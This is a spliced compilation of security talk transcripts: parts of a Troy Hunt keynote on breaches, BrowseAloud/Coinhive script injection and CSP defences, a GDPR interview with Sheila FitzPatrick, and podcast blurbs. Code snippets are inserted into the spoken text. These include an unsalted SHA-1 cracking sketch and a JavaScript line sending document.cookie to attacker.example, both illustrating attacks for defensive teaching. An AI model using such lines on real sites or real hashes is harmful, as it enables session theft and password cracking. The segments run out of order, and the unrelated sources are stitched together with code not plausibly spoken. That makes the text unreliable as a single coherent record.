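            access = "read/write" if mode & stat.S_IWOTH else "read-only"
            open_dirs.append((dirpath, access))
    return open_dirs

if __name__ == "__main__":
    for path, access in find_world_readable_dirs("/srv/shares"):  # hypothetical share root
        print(f"OPEN TO EVERYONE ({access}): {path}")
```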
So, time and time again in running ''Have I Been Pwned'', I find that I'm the vector by which organizations learn of a data breach. And this shouldn't be the way. Very often, this involves very large amounts of data as well. It can be many tens of gigabytes of data that someone has sent me, and I've got to go to the organization and say, ''Hey look, I've got your data. I think this is yours. You should do something with it.'' I'm in the middle of about half a dozen disclosures right now. One of them is tens of gigabytes of log files, and those log files include things like emails. Some of them are disparaging. I'll leave it at that. I'm not quite sure how this will pan out yet. But Troy Hunt should not be your disclosure mechanism. This is not the way you want it to work.
So, these organizations really need to do a better job of detecting when data is flying out of their networks in abnormal ways. And if we go back and have a look at some of the really notable recent incidents, you can see just how much data we're talking about. LinkedIn is a good example. Often when I do talks, I talk about ''Have I Been Pwned'' and I'll ask the audience, ''So, who was in LinkedIn?'' And there's always a heap of people in LinkedIn, because there are 165 million records there, including mine, unfortunately.
Now, the thing is, their data breach happened in 2012. And back in 2012, they did actually acknowledge it. They said, ''Look, we've had a cyber thing, we don't think it's too bad.'' I think at the time, they thought it might've been something like 5 million records, not too bad. And then four years passed. So for four years, someone had all this data. SHA-1 hashed passwords too. So, pretty trivial to crack those.
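To illustrate why fast, unsalted SHA-1 password storage is so trivial to attack, here is a minimal sketch of a dictionary check against a handful of hashes. The hashes and wordlist below are made up for the example and are not from the LinkedIn data.

```python
import hashlib

# Hypothetical leaked, unsalted SHA-1 hashes (hex) and a tiny wordlist
leaked_hashes = {
    "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",  # sha1("password")
    "7c4a8d09ca3762af61e59520943dc26494f8941b",  # sha1("123456")
}
wordlist = ["password", "123456", "letmein", "linkedin"]

# Hash every candidate and compare; with no salt, one pass covers every user at once
for candidate in wordlist:
    digest = hashlib.sha1(candidate.encode()).hexdigest()
    if digest in leaked_hashes:
        print(f"cracked: {digest} -> {candidate}")
```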
In fact, I was speaking to someone at an event just yesterday in Sydney, and they said they'd gone through and managed to crack about 98% of them. So, for all intents and purposes, that cryptographic storage was absolutely useless. Four years between incident and detection. Dropbox is another popular one a lot of people have been in, including me. And again, the same sort of time frame: the incident happened in 2012, and it took four years before they realized what had actually happened and just how bad it was.
In fact, as I understand it, and bear with me here, the way the Dropbox data breach went down was that a Dropbox employee was storing a backup of Dropbox data in their Dropbox, and then their Dropbox got broken into. It's all very meta. But apparently, that was what happened. But four years passed before we learned about the incident. Another one, also one that I was in. This is not an intentional thing; I've just been in a lot of data breaches.
Disqus. So, someone reached out to me last year and said, ''Look, I've got the Disqus data. There's about 18 million records in here.'' And I had a look at it and it looked very legitimate. And then I found my own data. And incidentally, finding your own data in a data breach makes verification a lot easier.
Actually, my number one blog post ever is titled ''The Dropbox hack is real''. And it was number one, I think, because I managed to get verification out there very early. The way I verified it is that I had a 1Password-generated password, so it's just 40 or 50 crazy random characters, and there was a bcrypt hash in the database. And when I passed in that crazy random string as the password, it matched. There we go. So, good.
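That verification trick, checking a known password against a leaked bcrypt hash, takes only a few lines. Below is a minimal sketch, assuming the third-party Python bcrypt package and using made-up stand-in values rather than the real breach record.

```python
import bcrypt

# Hypothetical stand-ins: in the real scenario the stored hash comes from the breach data,
# and the candidate comes from the password manager.
stored_hash = bcrypt.hashpw(b"k8#Qz-40-to-50-random-characters", bcrypt.gensalt())
candidate = b"k8#Qz-40-to-50-random-characters"

# checkpw re-hashes the candidate using the salt embedded in the stored hash
if bcrypt.checkpw(candidate, stored_hash):
    print("Match: this breach record really is mine.")
else:
    print("No match.")
```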
So, Disqus looked legitimate, and I reached out to them. And that was the first they knew of it. They said, ''Look, you know, we weren't aware of any incident, certainly not an incident dating back three years.'' And they verified it, and then had to go through the disclosure process. And again, like these organizations, your organization really doesn't want to be getting emails from me. It's not a good day usually.
Imgur was the last one, also last year, slightly after Disqus and with a very, very similar sort of time frame. Now, fortunately, there were only 1.7 million records, and I think it was only that small because the data dated back to a point which was pretty early on. So, they managed to dodge a bit of a bullet. But, you know, even still, four years passed from almost 2 million records being breached to when they actually realized it.
So, clearly, we've got a problem with detection. And I think that's really, really sort of worthwhile everyone thinking about. If you did have malicious activity happened within your internal network or within your website, would you actually be able to identify anomalous behavior? And would you be able to identify it or is the first you're going to know about it when you get an email from me?
So, moving on, the money pit is an interesting one. Now, this is kind of a little bit delicate. Because there's obviously a lot of companies out there selling a lot of security things. And the trick that organizations have today is they are just absolutely bombarded by messaging.
If any of you have been to any of the big security shows, particularly something like RSA in San Francisco, it's just absolute bedlam with security companies everywhere selling cyber things. And it's very, very hard. In fact, I'm very sympathetic to organizations who are trying to make decisions about, how are we going to protect our company? Because everywhere they look there is a cyber-something. And I'll give you a few examples of this. There are cyber enablement services. You can go and buy cyber-enablement. There are cyber innovation services. That's also a thing here. You can go and buy cyber innovation services. There are even cyber matrix services. You can buy into the cyber matrix. Not quite sure what it is, but it is out there.
And just to make the point that these are actually all genuine services out there, have a Google for them. There are 27,000 cyber enablement results out there, fifty-two thousand for cyber innovation, and if we go all the way down to matrix, there are going on 44,000 cyber matrix results. And you might be looking at this going, where on earth do they get these terms from? Is this something they just make up? It's not something I made up, but it is something you can make up, because every one of these came out of the bullshit generator.
There is literally a website. You can see the URL up there on the top right. And I know that everyone now wants to go there because it's actually really cool. So, you go there and you can make bullshit. And what it does is it combines a verb, an adjective, and a noun. And all I did is, I just went and took a bunch of those and added them after cyber and we got the results we saw before.
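The mechanism described, gluing together a random verb, adjective, and noun, is easy to reproduce. Here is a minimal sketch with invented word lists; the actual generator's vocabulary is its own.

```python
import random

verbs = ["repurpose", "streamline", "enable", "orchestrate", "operationalize"]
adjectives = ["interactive", "next-generation", "holistic", "frictionless", "scalable"]
nouns = ["readiness", "functionalities", "synergies", "matrices", "paradigms"]

def generate_buzzphrase():
    """Combine one random verb, adjective, and noun into a marketing-ready phrase."""
    return f"{random.choice(verbs)} {random.choice(adjectives)} {random.choice(nouns)}"

print(generate_buzzphrase())             # e.g. "streamline next-generation functionalities"
print("cyber " + random.choice(nouns))   # e.g. "cyber matrices"
```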
So, that's actually kind of cool. You just go through and you make new terms: repurpose interactive readiness, I can barely even say that one. You go through and streamline next-generation functionalities. This is a real service. Give this to your marketing people; they will love it. It will drive you nuts, but they'll love it. And this was meant to be a little bit tongue in cheek, but the very fact that I could go here and generate terms that are actual things people are selling sort of demonstrates how difficult it is for those who actually have to make decisions about where they spend their cyber dollar.
So, moving on, let's just wrap up a few takeaways here from what we've just looked at and then we'll go through and do some questions. So, thinking back to the conventional risks, we still have the same fundamental underlying problems today as we did many, many years ago. We've also got a whole bunch of new ones as well. And particularly thinking about conventional risk, things like risks in the humans are still massive. We've really not put much of a dent in phishing attacks. You know, a great example, we've still got this conventional vulnerability, which is the organic matter sitting at the keyboard, and we haven't been able to solve it yet. The monetization side of things as well.
So, many of the old monetization strategies still apply today. They've just been streamlined because we've got cryptocurrency and email and internet, which we didn't have when these things started out. And of course, monetization also goes all the way through to the organizations that are...I was going to say defending against these attacks. I'm not sure if that's a fair representation of professional data recovery, but certainly playing in that ecosystem.
The supply chain bit I think is really fascinating. And the bit that we looked at was really just this sort of embedding of external services. It doesn't touch on all the libraries that we're dependent on or all the other things that go into modern-day software. But this is becoming a problem. And that's before we even get into things like the hardware supply chain. So, where does your hardware come from? Do you trust that party?
And there's certainly some very interesting things going on at the moment that cast some really massive doubts about where we can trust our equipment to come from. So, have a think about all the different bits and pieces that go into modern-day applications and indeed into physical infrastructure as well. On the detection side of things, I sort of metaphorically posed the question for us and said, ''Look, how well equipped are you to detect if there's large amounts of data being exfiltrated from your network or from your website?'' And in fairness, this is a nontrivial problem as well. This is not an easy thing, but it's an important thing. Because again, as I said a couple of times, like you really don't want to be getting emails from me. You especially don't want to see like a tweet from me saying, ''Do you have a security contact at your company?''
This is not the way you want your detection to work. It's much better to detect it quietly and try to stop it before it happens in the first place. And finally, there's that piece on the money pit. Again, I have a huge amount of sympathy for organizations that are having to make decisions today about where they spend their money, particularly when there are a bunch of infosec companies out there claiming they'll solve all your problems with this one shiny thing. Because of course, the one shiny thing is a very attractive thing to the people who hold the purse strings in a lot of organizations, who very frequently aren't the technical folks but are wowed by flashy presentations.
And I just had a flashback to my corporate life for a moment there. So, those are the five takeaways from the talk, and I hope that they, if nothing else, give you food for thought about what's going on with your applications and your environment today. ...
We had a unique opportunity to talk with data privacy attorney Sheila FitzPatrick. She lives and breathes data security and is a recognized expert on EU and other international data protection laws. FitzPatrick has direct experience representing companies in front of EU data protection authorities (DPAs). She also sits on various governmental data privacy advisory boards.
During this first part of the interview with her, we focused on the new General Data Protection Regulation (GDPR), which she says is the biggest overhaul in EU security and privacy rules in twenty years.
One important point FitzPatrick makes is that the GDPR is not only more restrictive than the existing Data Protection Directive—breach notification, impact assessment rules—but also has far broader coverage.
Cloud computing companies no matter where they are located will be under the GDPR if they are asked to process personal data of EU citizens by their corporate customers. The same goes for companies (or controllers in GDPR-speak) outside the EU who directly collect personal data – think of any US-based e-commerce or social networking company on the web.
Keep all this in mind as you listen to our in-depth discussion with this data privacy and security law professional.
Cindy Ng
Sheila FitzPatrick has over 20 years of experience running her own firm as a data protection attorney. She also serves as outside counsel for Netapp as their chief privacy officer, where she provides expertise in global data protection compliance, cyber security regulations, and legal issues associated with cloud computing and big data. In this series, Sheila will be sharing her expertise on GDPR, PCI compliance, and the data security landscape.
Andy Green
Yeah, Sheila. I'm very impressed by your bio and the fact that you've actually dealt with some of these DPAs, the EU data protection authorities that we've been writing about. So the GDPR will go into effect in 2018, and I'm just wondering what is perhaps the biggest change for companies, I guess they're calling them data controllers, in dealing with DPAs under the law. Is there something that comes to mind first?
Sheila FitzPatrick
And thank you for the compliment, by the way. I live and breathe data privacy. This is the stuff I love. GDPR is certainly the biggest overhaul in 20 years when it comes to new data privacy regulations. It's much more restrictive than what we've seen in the past, and most companies are struggling because they thought what was previously in place was strict.
There are a couple of things that stick out when it comes to GDPR. One is when you look at the roles of the data controller versus the data processor. In the past, many data processors, especially third-party outsourcing companies and in particular cloud providers, have pushed sole liability for data compliance down to their customers. Basically saying: you decide what you're going to put in our environment, you have responsibility for the privacy and security aspects, and we accept only minimal responsibility, usually around physical security.
The GDPR is now going to put very comprehensive and well-defined regulations and obligations in place for data processors as well, saying that they can no longer flow responsibility for privacy compliance down to their customers. Oftentimes, cloud providers will say, "We will comply with the laws in the countries where we have our processing centers." And that's not sufficient under the new law. Because if they have a data processing center, say, in the UK, but they're processing the data of a German citizen or a Canadian citizen or someone from Asia Pacific, Australia, or New Zealand, they're now going to have to comply with the laws in those countries as well. They can't just push it down to their customers.
The other part of GDPR that is quite different and it's one of the first times it's really going to be put into place is that it doesn't just apply to companies that have operations within the EU. It is basically any company regardless of where they're located and regardless of whether or not they have a presence in the EU, if they have access to the personal data of any EU citizen they will have to comply with the regulations under the GDPR. And that's a significant change. And then the third one being the sanction. And the sanction can be 20,000,000 euro or 4% of your global annual revenue, whichever is higher. That's a substantial change as well.
Andy Green
Right. So those are some big, big changes. You're referring to, I think, what they call 'territorial scope'? They don't necessarily have to have an office or an establishment in the EU as long as they are collecting data? I mean, we're really referring to social media and web commerce, or e-commerce.
Sheila FitzPatrick
Absolutely, but it's going to apply to any company. So even if, for instance, you say, "Well, we're just a US domestic company," if you have employees in your environment who hold EU citizenship, you will have to protect their data in accordance with GDPR. You can't say, well, they're working in the US, therefore US law applies. That's not going to be the case if they know that the individual holds citizenship in the EU.
Andy Green
We're talking about employees, or...?
Sheila FitzPatrick
Could be employees, absolutely. Employees...
Andy Green
Anybody?
Sheila FitzPatrick
Anybody.
Andy Green
Isn't that interesting? I mean one question about this expanded territorial scope, is how are they going to enforce this against US companies? Or not just US, but any company that is doing business but doesn't necessarily have an office or an establishment?
Sheila FitzPatrick
Well, it can be... see, what happens under GDPR is any individual can file a complaint with the courts in basically any jurisdiction. They can file it at the EU level. They can file it within the countries where they hold their citizenship. They can now also file it with the US courts, although the US courts... part of that is tied to the new Privacy Shield, which is a joke. I mean, I think that will be invalidated fairly quickly. With the whole Redress Act, it does allow EU citizens to file complaints with the US courts to protect their personal data in accordance with EU laws.
Andy Green
So, just to follow through, if I came from the UK into the US and was doing transactions, credit card transactions, my data would be protected under EU law?
Sheila FitzPatrick
Well, if the company knows you're an EU citizen. They're not going to necessarily know. So, in some cases, if they don't know, they're not going to be held accountable. But if they absolutely do know, then they will have to protect that data in accordance with UK or EU law. Well, not the UK... if Brexit goes through, EU law won't matter; the UK Data Protection Act will take precedence.
Andy Green
Wow. You know, it's just really fascinating how data protection and privacy are now so important, right, with the new GDPR? For everybody, not just the EU companies.
Sheila FitzPatrick
Yeah, and it's always been important; it's just that the US has a totally different attitude. I mean, the US has the least restrictive privacy laws in the world. So for individuals who have never really worked or lived outside of the US, the mindset is very much the US mindset, which is that business takes precedence. Everywhere else in the world, the fundamental right to privacy takes precedence over everything.
Andy Green
We're getting a lot of questions from our customers about the new Breach Notification rule...
Sheila FitzPatrick
Ask me.
Andy Green
...in the GDPR. I was wondering if you could talk about... What are some of the most important things you would do when you discover a breach, if you could prioritize them in any way? How would you advise a customer on setting up a breach response program in a GDPR context?
Sheila FitzPatrick
Yeah. Well, first and foremost, you need to have in place, before a breach even occurs, an incident response team that's not made up of just IT, because normally organizations have an IT focus. You need a response team that includes IT and your chief privacy officer. Normally a CPO would sit in legal; if they don't sit in legal, you want a legal representative in there as well. You need someone from PR or communications who can be the public-facing voice for the company. And you need someone from Finance and Risk Management who sits on there.
So the first thing to do is to make sure you have that group in place that goes into action immediately. Secondly, you need to determine what data has potentially been breached. Because under GDPR, the threshold has changed: previously it was whether there had definitely been a breach that could harm an individual. The new definition is whether it's likely to affect an individual, which is totally different from whether the individual could be harmed. So you need to determine, okay, what data has been breached, and does it impact an individual?
If company-related information was breached, there's a different process you go through. If individual employee or customer data has been breached, the question is: is it likely to affect the individual? And that's pretty much anything; it's a very broad definition. If someone gets hold of their email address, yes, that could affect them, because someone who is not authorized to email them could email them.
So, you have to launch into that investigation right away and classify the data that has been touched by the intrusion: what is that data classified as?
Is it personal data?
Is it personal sensitive data?
And then rank it based on is it likely to affect an individual?
Is it likely to impact an individual? Is it likely to harm an individual?
So there could be three levels.
Based on that, what kind of notification? So if it's likely to affect or impact an individual, you would have to let them know. If it's likely to harm an individual, you absolutely have to let them know and the data protection authorities know.
Andy Green
And the DPA, right? So, if I'm a consumer, the threshold is... in other words, if the company's holding my data, I'm not an employee, the threshold is likely to harm or likely to affect?
Sheila FitzPatrick
Likely to affect.
Andy Green
Affect. Okay. That's a little more generous in terms of...
Sheila FitzPatrick
Right. Right. And that has changed, so it puts more accountability on a company, because you know a lot of companies have probably had breaches and never reported them, because they go, oh well, there was no Social Security Number, National Identification Number, or financial data. It was just their name and their address and their home phone number or their cell phone. And the definition previously has been, well, it can't really harm them, we don't need to let them know.
And then all of a sudden people's names show up on these mailing lists. And they're starting to get this unsolicited marketing. And they can't determine whether or not... how did they get that? Was it based on a breach or is it based on trolling the Internet and gathering information and a broker selling that information? That's the other thing. Brokers are going to be impacted by the new GDPR, because in order to sell their lists they have to have explicit consent of the individual to include their name on a list that they're going to sell to companies.
Andy Green
Alright. Okay. So, it's quite consumer friendly compared to what we have in the US.
Sheila FitzPatrick
Yes.
Andy Green
Are there new rules about what they call sensitive data? If you're going to process certain classes of sensitive data, you need approval from the... I think at some point you might need approval from the DPA? You know what I'm referring to? I think it's the...
Sheila FitzPatrick
Yes. Absolutely. I mean, that's always been in place in most of the member states. So, if you look at the member states that have the more restrictive data privacy laws like Germany, France, Italy, Spain, Netherlands, they've always had the requirement that you have to register the data with the data protection authorities. And in order to collect and transfer outside of the country of origination any sensitive data, it did require approval.
The difference now is that any personal data that you collect on an individual, whether it's an employee, whether it's a customer, whether it's a supplier, you have to obtain unambiguous and freely given explicit consent. Now this is any kind of data, and that includes sensitive data. Now the one difference with the new law is that there are just a few categories which are truly defined as sensitive data. That's not what we think of sensitive data. We think of like birth date. Maybe gender. That information is certainly considered sensitive under... that's personal data under EU law and everywhere else in the world, so it has to be treated to a high degree of privacy. But the categories that are political/religious affiliation, medical history, criminal convictions, social issues and trade union membership: that's a subset. It's considered highly sensitive information in Europe. To collect and transfer that information is going to now require explicit approval not only from the individual but from the DPA. Separate from the registrations you have done.
Andy Green
So, I think what I'm referring to is what they call the Impact Assessment.
Sheila FitzPatrick
Privacy Impact Assessments have to be conducted now anytime... and we've always... Anytime I've worked with any company, I've implemented Privacy Impact Assessments. They're now required under the new GDPR for any collection of any personal data.
Andy Green
But sensitive data... I think they talked about DNA data or bio-related data.
Sheila FitzPatrick
Oh no. What happened under GDPR is they expanded the definition of personal data. So that's not the sensitive data category; that's expanding the definition of personal data to include biometric information, genetic information, and location data. That data was never included under the definition of personal data, because the belief was, well, you can't really tie it back to an individual. They have found out since the original laws were put in place that yes, you can indeed tie it back to an individual. So that is now included in the definition.
Andy Green
So it's sort of catching up a little bit with the technology?
Sheila FitzPatrick
Yeah. Exactly. Part of what GDPR did was go from being a law about the processing of personal data to a law that really moves into the digital age. So, it covers anything about tracking or monitoring, or tying different aspects or elements of data together to be able to identify a person. It's really entering the digital age; it's trying to catch up with new technology.
Andy Green
I have one more question on the GDPR subject. There's some mention in the law about how outside bodies can certify...?
Sheila FitzPatrick
Well, they're talking about having private certifications and privacy codes. Right now, those are not in place. The highest standard you have right now for privacy is what's called Binding Corporate Rules, and fewer than a hundred companies worldwide have those in place. I've actually written them for a number of companies, and NetApp has Binding Corporate Rules in place. That is the gold standard. If you have BCRs, you are 90% compliant with GDPR. But the additional certifications that they're talking about aren't in place yet.
Andy Green
So, it may be possible to get a certification from some outside body and that would somehow help prove your... I mean, so if an incident happens and the DPA looks into it, having that compliance should help a little bit in terms of any kind of enforcement action?
Sheila FitzPatrick
Yes, it certainly will, once they come up with what those are, unless you have Binding Corporate Rules. But right now... I mean, if you're thinking of something like TRUSTe, no, there is no such certification for this. TRUSTe is a US certification for privacy, but it's not a certification for GDPR.
Andy Green
Alright. Well, thank you so much. I mean these are questions that, I mean it's great to talk to an expert and get some more perspective on this.
Learning about the CIA’s tips and tricks on disguising one’s identity reminded us that humans are creatures of habit and, over time, reveal predictable behavioral patterns that can be captured as biometric data. As a result, businesses can leverage these data points and integrate them into their operations and sales processes.
For instance, businesses are buying data about one’s health and filing patents on ways to measure a user’s pulse and temperature. Others are studying user psychology and making it difficult for a user to cancel a service.
Other articles discussed:
Vulnerability after vulnerability, we’ve seen that there’s no perfect model for security. Hence, the catchphrase, “If you can’t build in security, then build in accountability.”
But history has also shown that even if there was enough political will and funding, consumers aren’t interested in paying a huge premium for security when a comparable product with the features they want is available much more cheaply.
Will that theory hold when it comes to self-driving cars? At the very least, safety should be a foundational tenet. What’s the likelihood that anyone would enter a self-driving car knowing that a number of things could go wrong?
Other articles discussed:
Panelists: Cindy Ng, Kris Keyser, Kilian Englert
Troy Hunt, creator of “Have I been pwned”, gives a virtual keynote that explores how security threats are evolving - and what we need to be especially conscious of in the modern era.
In this keynote, you’ll learn:
and much more!
Troy Hunt: Then moving on, another one I think is really fascinating today is the supply chain, the modern supply chain. And what we're really talking about here is: what are the different bits and pieces that go into modern-day applications, and what risks do those bits and pieces then introduce into the ecosystem?
There are some interesting stats which help set the scene for why we have a problem today. The first one I want to start with: the average size of a webpage was just over 700 kilobytes in 2010. But over time, websites have started to get a lot bigger. Fast forward a couple of years and they're literally 50% larger, growing very, very fast. Go through another couple of years and we're approaching 2 megabytes. Get to 2016 and we're at 2.3 megabytes. The average webpage is 2.3 megabytes.
And when you have a bit of a browse around the web, maybe just open up the Chrome DevTools and have a look at the number of requests that come through. Go through on the application part of the DevTools, have a look at the images. And have a look at how big they are. And how much JavaScript, and how many other requests there are. And you realize not just how large pages are, but how the composition is made up from things from many, many different locations. So, we've had this period of six years where we've tripled the average size of a webpage. And of course, ironically, during that period we've become far more dependent on mobile devices as well. Which very frequently have less bandwidth or more expensive bandwidth, particularly if you're in Australia.
So, we've had this period where things have grown massively, in an era where we really would have hoped that maybe they'd become a little bit more efficient. The reason I stopped at 2016 is because the 2.3-megabyte number is significant, and the reason it's significant is because that's the size of Doom. Remember Doom, the original Doom, the 1993 Doom? If you're a similar age to me or thereabouts, you probably blew a bunch of your childhood on it, when you should've been doing homework, just going around fragging stuff with the BFG.
So, Doom was 2.3 megabytes. That's the original size of it. And just as a reminder of the glory of Doom, remember what it was like. You just wander around these very shoddy looking graphics, but it was a first-person shoot-em-up. There were monsters, and aliens, and levels, and all sorts of things. Sounds. All of that went into two floppy disks and that's your 2.3 megabytes. So, it's amazing to think today when you go to a website, you're looking at the entire size of Doom, bundled into that one page, loaded on the browser.
Now, that leads us into where all of that goes. So, let's consider a modern website: the U.S. Courts website. I actually think it's a pretty cool-looking government website; most government websites don’t look this cool. But, of course, to make a website look cool, there's a bunch of stuff that's got to go into it.
So, if we break this down by content type, predictably the images are large. You've got 1.1 megabytes worth of images, so almost half the content there is just images. The one I found particularly fascinating, though, when I started breaking this apart, is the script, because you've got about three-quarters of a megabyte worth of JavaScript. Now keep in mind, JavaScript can be very well optimized; it should be minified, it should be quite efficient. So, where do 726 kilobytes worth of script go?
Well, one of the things we're seeing with modern websites is that they're composed of multiple different external services. And in the case of the U.S. Courts website, one of those services is BrowseAloud.
And BrowseAloud is interesting. So, this is an accessibility service made by a company called Texthelp. And the value proposition of BrowseAloud is that if you're running a website, and accessibility is important to you...and just to be clear about what we mean by that, if someone is visually impaired, or if English is maybe their second language, or if they need help reading the page, then accessibility is important. And accessibility is particularly important to governments because they very often have regulatory requirements to ensure that their content is accessible to everyone.
So, the value proposition of a service like BrowseAloud is that there's this external thing that you can just embed on the site. And the people building the site can use all their expertise to actually build the content, and the taxonomy, and whatever else of the site. They just focus on building the site and then they pull in the external services. A little bit like pulling in an external library. So, these days there's a lot of libraries that go into most web applications. We don't go and build all the nuts and bolts of everything. We just throw probably way too much jQuery out there. Or other themes that we pull from other places.
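To make that dependency concrete, here is roughly what such a third-party embed looks like in a page's HTML (the URL is illustrative of the pattern rather than quoted from the talk):

    <script src="https://www.browsealoud.com/plus/scripts/ba.js" type="text/javascript"></script>

Every visitor's browser fetches and executes that file with the full privileges of the embedding page, which is exactly why the next question matters.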
Now, in the case of BrowseAloud, it begs the question: what would happen if someone could change that ba.js file? And really where we're leading here is that if you can control the JavaScript that runs on a website, what would you do? If you're a bad dude, what could you do if you could modify that file? And the simple answer is that once you're running JavaScript in the browser and you have control over that JavaScript, there is a lot you can do. You can pull in external content, you can modify the DOM. You can exfiltrate anything that can be accessed via client script.
So, for example, the cookies: you can access all the cookies as long as the cookies aren't flagged as HttpOnly. And guess what? A lot of cookies that should be flagged HttpOnly still aren't. So, you have a huge amount of control when you can run arbitrary JavaScript on someone else's website. Now, here's what went wrong with the BrowseAloud situation. You've got all of these websites using this exact script tag, thousands of them, many of them government websites.
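As a rough sketch of why that HttpOnly flag matters (attacker.example is a placeholder domain, not something from the talk), any injected script can ship non-HttpOnly cookies off to a third party in a single line, while the server-side flag keeps them out of reach of client script entirely:

    // injected script can read and exfiltrate every cookie that lacks HttpOnly
    new Image().src = 'https://attacker.example/steal?c=' + encodeURIComponent(document.cookie);

    // the mitigation is set server-side on the response, for example:
    // Set-Cookie: session=<value>; HttpOnly; Secure; SameSite=Lax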
And earlier this year, Scott Helme, he discovered that the ICO, the Information Commissioner's Office in the UK, so basically the data regulator in the UK, was loading this particular JavaScript file. And at the top of this file, was some script which shouldn't be there. And if you look down at about the third line and you see Coinhive, you start to see where all of this has gone wrong.
Now, let's talk about Coinhive briefly. So, everyone's aware that there is cryptocurrency and there is cryptocurrency mining. The value proposition of Coinhive...and you can go to coinhive.com in your browser, nothing bad is going to happen, you can always close it, but bear with me, I'll explain. So, the value proposition of coinhive.com is this: you know how people don't like ads? You go to a website, and there's tracking, and they're obnoxious, and all the rest of it. Coinhive's pitch is that because people don't like ads, but you might still want to monetize your content, you can get rid of the ads and just run a crypto miner in people's browsers. And what could go wrong? And in fairness, if there's no tracking and you're just chewing up a few CPU cycles, then maybe that is a better thing, but it just feels dirty. Doesn't it?
You know, like if you ever go to a website and there's a Coinhive crypto miner on there, and they usually mine Monero, and you see your CPU spiking because it's trying to chew up cycles to put money in someone else's pocket, you're going to feel pretty dirty about it. So, there is a valid value proposition for Coinhive. But unfortunately, when you're a malicious party, and there's a piece of script that you can put on someone else's website, and you can profit from it, well then obviously, Coinhive is going to be quite attractive to you as well.
So, what we saw was this Coinhive script being embedded into the BrowseAloud JavaScript file, then the BrowseAloud JavaScript file being embedded into thousands of other websites around the world. So, U.S. Courts was one. U.S. House of Representatives was another. I mentioned the Information Commissioner's Office, the NHS in Scotland, the National Health Service, so all of these government websites.
Now, when Scott found this, one of the things that both of us found very fascinating about it is that there are really good, freely accessible browser security controls out there that will stop this from happening. So, for example, there are content security policies.
And content security policies are awesome because they're just a response header, and every single browser supports them. And a CSP lets you say, "I would like this browser to be able to load scripts from these domains and images from those domains." And that's it. And then if any script tries to be loaded from a location such as coinhive.com, which I would assume you're not going to whitelist, it gets blocked. So, this is awesome. This stops these sorts of attacks absolutely dead.
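As a minimal sketch (the allowed origins here are hypothetical, not a recommendation for any particular site), a policy like the following, sent as an HTTP response header, would have stopped the injected miner because coinhive.com is not on the script whitelist:

    Content-Security-Policy: default-src 'self'; script-src 'self' https://www.browsealoud.com; report-uri https://example.com/csp-reports

Any script from an origin outside that list is simply refused by the browser, and the optional report-uri directive sends violation reports so the site owner finds out the attempt happened.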
Adoption of content security policies, though, is tiny: about 97% of sites aren't using them, so it's roughly a 3% adoption rate. And the reason why I wanted to flag this is because this is something which is freely accessible. It's not something you go out and spend big bucks on with a vendor. When I was in London at the Infosecurity EU Conference, there were loads of vendors there selling loads of products, and many of them are very good products, but also a lot of money. And I'm going, "Why aren't people using the free things?" Because the free things can actually fix this. And I think it probably boils down to education more than anything else.
Now, interestingly, if we go back and look at that U.S. Courts website, here's how they solved the problem. They basically just commented it all out, and arguably this does actually solve the problem. Because if you comment out the script and someone modifies it, well, now it's not a problem anymore. But now you've got an accessibility problem. I've actually had people, after I've been talking about this, say, "Oh, you should never trust third-party scripts. You should just write all this yourself." This is an entire accessibility framework with things like text to speech. You're not going to go out and write all that yourself. You've actually got to go and build content.
Instead, we'd really, really like to see people actually using the security controls to be able to make the most of services like this, but do so in a way that protects them if anything goes wrong. Now, it's interesting to look at sites that are still embedding BrowseAloud but are doing so with no CSP. And in case anyone's wondering, no Subresource Integrity either. So, things like major retailers, there are still U.S. government sites, there are still UK government sites. And when I last looked at this, I found a UK transportation service as well. Exactly the same problem.
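Subresource Integrity complements a CSP here: the embedding page pins the expected content of the third-party file, so a tampered ba.js fails the hash check and never executes. A sketch of what that looks like (the digest below is a placeholder, not the real file's hash):

    <script src="https://www.browsealoud.com/plus/scripts/ba.js"
            integrity="sha384-PLACEHOLDER_BASE64_DIGEST"
            crossorigin="anonymous"></script>

The trade-off is that the embedding site has to update the integrity value whenever the provider legitimately changes the script.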
And one of the things that sort of makes me lament is that even after we have these issues, where we've just had an adversary run arbitrary script in everyone's browser...and let's face it, getting just Coinhive is dodging a bullet, because that is a really benign thing in the scope of what you could have done if you could run whatever script you wanted in everyone's browser. But even after all that, these services are still just doing the same thing. So, I don't think we're learning very well from previous incidents. ...
Troy Hunt, creator of “Have I been pwned”, gives a virtual keynote that explores how security threats are evolving - and what we need to be especially conscious of in the modern era.
Troy Hunt: Where I'd like to start this talk is just to think briefly about some of these, sort of, conventional threats that we've had, and in particular some of the ways in which some of the just absolute fundamentals of InfoSec we're still struggling with today just as we were yesterday. And I wanted to kind of set a bar, and this will be...as you will see in a moment, it's kind of like a very, very low bar. And then we'll have a look at some of the newer things.
I was looking around for examples and I actually...it's always nice to talk about something in your own country where you've come from, so I wanted to try and find an example that showed where that bar was. And very fortuitously, not so much for them, we had a little bit of an incident with CommBank. CommBank are pretty much the largest bank in the country, certainly one of our big four banks. As part of our royal commission into banking at the moment, where all the banks are coming under scrutiny, there was a little bit of digging done on the CommBank side and they discovered that there had actually been an incident which they needed to disclose. One of the reasons it's fascinating is because banks are, sort of, the bastions of high levels of security. So we have this term, we literally have a term, bank-grade security, which of course people imply means very, very good security, not always that way but that's the expectation.
So CommBank had to disclose a bit of an incident where they said, "Look, we're decommissioning a data center, moving from one data center to another and as part of the decommissioning processes, what we needed to do was take all the tapes with the customer data on them and send them for destruction. And what they've done is they've loaded all of the tapes up onto a truck, I've got some file footage, here's the Commonwealth Bank truck. So all of the tapes are on the truck, the truck's driving along, they're taking all the data from this one data center and they're going to go and securely destroy it. Now, there's about 12 million customer records on the back of the truck, and it's driving along and it turns out they may have put just a few too many datas on the truck and some of it fell off. And this was the disclosure, like, there was some data that was lost, it might have fallen off the back of the truck.
And there was literally a statement made by the auditors, I think it was KPMG that audited them, they said, "Forensic investigators hired to assess the breach, retraced the route of the truck to determine whether they could locate the drives along the route but were unable to find any trace of them."
And I just find it fascinating that in this era of high levels of security in so many ways and so much sophistication, we're still also at the point where data is literally falling off the back of a truck. Not metaphorically, but literally falling off the back of a truck. Possibly, anyway; they couldn't find it again, so maybe it didn't fall off, but those were the headlines we were faced with a few months ago.
So it's interesting to sort of keep that in mind and you'll see other, sort of, analogous things to data falling off the back of a truck, perhaps in a more metaphorical sense, every single day online. I mean the canonical one at the moment is data exposed in open S3 buckets. Going back to late 2016, early last year it was constantly data in exposed MongoDBs with no passwords on it. So we're leaving data lying all over the place, either digitally or potentially even physically in the case of CommBank.
